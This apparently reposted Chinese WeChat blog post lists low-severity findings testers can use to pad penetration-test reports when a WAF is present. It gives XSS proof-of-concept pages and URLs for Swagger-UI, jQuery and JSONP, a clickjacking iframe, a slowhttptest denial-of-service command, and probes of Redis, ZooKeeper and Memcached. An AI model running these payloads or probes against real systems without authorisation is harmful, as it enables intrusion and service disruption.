当初熊猫为了脱离“菜鸡”称号可谓是煞费苦心,在测试有WAF防护的网站时,也会想办法凑出一堆中低危漏洞来充实报告内容,以证实工作量,便于划水......
那都有哪些漏洞可以用来凑数量呢?
发现网站存在Swagger-UI的入口页面swagger-ui.html。
需要提前构造一个配置文件test.json放到自己的服务器里面,如下所示:
{"url": "https://jumpy-floor.surge.sh/test.yaml","urls": [{"url": "https://jumpy-floor.surge.sh/test.yaml","name": "Foo"}]}
然后在Swagger-UI中使用?configUrl=和url参数复现XSS漏洞,加载的类型比如这样:
/swagger-ui.html?configUrl=https://jumpy-floor.surge.sh/test.json/swagger-ui.html?url=https://jumpy-floor.surge.sh/test.json/swagger-ui.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
发现网站使用jQuery-js,并且版本与poc匹配。
poc中填写目标站点的JQueryjs地址,如图所示:
<!-- poc请自行复制,保存为html格式 --><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Jquery XSS</title><script type="text/javascript" src="https://***.***.***/js/jquery-easyui-1.5.2/jquery.easyui.min.js"></script><!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> --><!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> --><!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> --><script>$(function () {// #9521// #11290$(location.hash);// #11974$('#bug').on('click', function () {$.parseHTML("<img src='z' onerror='alert("bug-11974")'>");return false;});})</script></head><body><h1>jQuery with XSS</h1><h2>Demo:</h2><p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p><ul><li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <ahref="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li><li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <ahref="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li><li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974"target="_blank">ticket</a></li></ul><h2>Test version:</h2><ul><li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li></ul><h2>Safe version:</h2><ul><li>1.12.0, 1.12.1 </li><li>2.2.0, 2.2.1</li><li>3.0.0, 3.0.1, 3.1.0, 3.1.1</li></ul></body></html>
然后本地浏览器打开poc点击test result,弹窗则证明存在漏洞:
发现网站系统支持了SSLv2加密算法,且该算法被暴露存在Drown跨协议攻击TLS漏洞。
通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况(工具下载链接如下)。
https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip运行方式:sslciphercheck.exe -h ip(目标地址) -p 443
或者使用nmap输入如下命令:
nmap -sV -p 端口 --script ssl-enum-ciphers 目标ipsslciphercheck显示如下则证明存在漏洞:
网站使用HTTP协议。
这个风险也叫不安全的HTTP方法,发现渗透网站是HTTP方法后,使用curl命令探测:
curl -I -X OPTIONS https://目标网站URL
网站为HTTP协议。
需要本地下载slowhttptest工具,然后使用命令验证即可:
项目地址:https://github.com/shekyan/slowhttptestslowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u https://xxxxxx
当显示为NO,则表示存在HTTP慢速攻击漏洞,可导致拒绝服务。
开放22端口。
使用nmap输入如下命令扫描:
nmap --script ssh2-enum-algos -sV -p 22查看扫描结果中的加密算法情况。
发现网站系统使用了SSLv3协议。
通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况。
https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip运行方式:sslciphercheck.exe -h ip(目标地址) -p 443
莽怼。
通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况。
https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip运行方式:sslciphercheck.exe -h ip(目标地址) -p 443
莽怼。
通常awvs可能会扫到,扫不到就是抓包之后改host即可,很简单。
莽怼。
通过替换poc中的URL,本地浏览器打开html查看是否被iframe标签嵌套。
<html><head><title>Clickjacking</title></head><body><iframe src="https://test.com/" width="500" height="500" /></iframe>
扫描发现有.map文件。
下载.map文件后,使用reverse-sourcemap还原vue代码。
使用npm安装reverse-souecemap,命令如下:
npm install reverse-sourcemap -greverse-sourcemap -o /存放逆向出源码的目录 -v /.map文件所在的目录
下载.map文件后,使用reverse-sourcemap还原vue代码。
Apache解析。
通过Burpsuite抓包对参数注入超长字节,使用户的cookie大于4k。
返回报错页面泄露用户Cookie信息。
莽怼。
通过浏览器控制台输入如下命令,弹窗及存在风险。
javascript:alert(document.cookie)
莽怼。
浏览器访问如下测试地址输入目标URL。
http://whois.chinaz.com/caimipai.com
莽怼。
通过手动点击注销登录之后使用注销的token继续尝试增删改查。
莽怼。
将URL填入POC,浏览器打开html,弹窗则证明漏洞存在。
<html><body><script> function wooyun_callback(a){ alert(a); } </script><script src="http://www.test.com/login.php?callback=wooyun_callback"></script></body></html>
基本Xray、AWVS都会扫出来。
直接上扫描。
开放端口:11211。
nmap直接上扫描。
nmap -sV -p 11211 --script=memcached-info 目标ip
开放端口:2181。
直接上kali。
echo envi | nc 目标ip 2181
开放端口:2049 (默认)。
直接上kali。
showmount -e IP
开放端口:6379。
直接上kali。
redis-cli -h IP -p port
莽怼。
浏览器开发者模式看见Webpack提就完事了。
有存储桶文件访问。
直接看,当敏感文件上传到公开空间,则任何知道URL链接的人都能访问。
除以上漏洞外,其实还有好多类似的漏洞,比如明文传输核心业务数据、多点认证缺陷、弱加密风险、IIS段文件名漏洞、证书失效、各种信息泄露.......
这些大家都知道的熊猫就不写了,关键就是看大家愿不愿意。
熊猫认为,只要有明确的整改建议以及明确的漏洞成因,那测到的漏洞就全可以提,干就完了,要不然还以为咱不知道这些漏洞呢。
原文始发于微信公众号(Jie安全):网安牛马碰见WAF如何凑出渗透报告漏洞数量?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论